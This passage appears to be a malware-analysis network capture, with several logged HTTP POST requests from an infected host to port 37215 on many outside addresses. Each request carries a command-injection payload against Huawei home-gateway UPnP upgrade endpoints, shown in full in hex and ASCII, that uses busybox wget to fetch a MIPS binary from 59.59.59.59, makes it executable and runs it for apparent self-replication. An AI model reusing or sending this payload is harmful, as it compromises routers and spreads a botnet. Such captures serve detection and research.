70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          758192.168.2.153989031.253.15.21837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.636213064 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          759192.168.2.153351480.253.146.18837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.636259079 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          760192.168.2.1544108157.26.92.8237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.663824081 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          761192.168.2.1549390197.130.246.5137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.663847923 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          762192.168.2.1544558157.206.193.18237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.663870096 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          763192.168.2.1542292157.184.65.9837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.663892031 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          764192.168.2.1547728111.132.59.22837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.663927078 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          765192.168.2.1541176197.48.57.10837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.663939953 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          766192.168.2.154936841.245.79.4737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.663975954 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          767192.168.2.154643641.242.83.20537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.663992882 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          768192.168.2.155974241.88.170.19637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.664036989 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
